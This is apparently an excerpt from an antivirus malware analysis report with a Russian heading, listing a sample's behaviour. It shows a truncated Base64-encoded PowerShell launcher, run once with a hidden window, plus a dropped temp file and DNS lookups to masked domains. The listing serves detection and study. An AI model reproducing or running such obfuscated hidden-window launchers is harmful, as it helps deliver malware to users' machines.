Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxAFoAQQBHAEEAXwBBAFEAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAWgAnACwAJwBEAEQAWgAnACwAJwB4AEEAJwApADsAJABGADQAQwBBAEEAWgBBACAAPQAgACcANAA5ADcAJwA7ACQAYwBHAFUAdwBBADQAWgA9ACgAI...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\856008.cvr
- DNS ASK ry#####motorhomes.co.uk
- DNS ASK vi###santina.nl
- DNS ASK ma###cpc.co.il
- DNS ASK ma##oca.es
- DNS ASK sa###aha.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABxAFoAQQBHAEEAXwBBAFEAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcAWgAnACwAJwBEAEQAWgAnACwAJwB4AEEAJwApADsAJABGADQAQwBBAEEAWgBBACAAPQAgACcANAA5ADcAJwA7ACQAYwBHAFUAdwBBADQAWgA9ACgAI...' (со скрытым окном)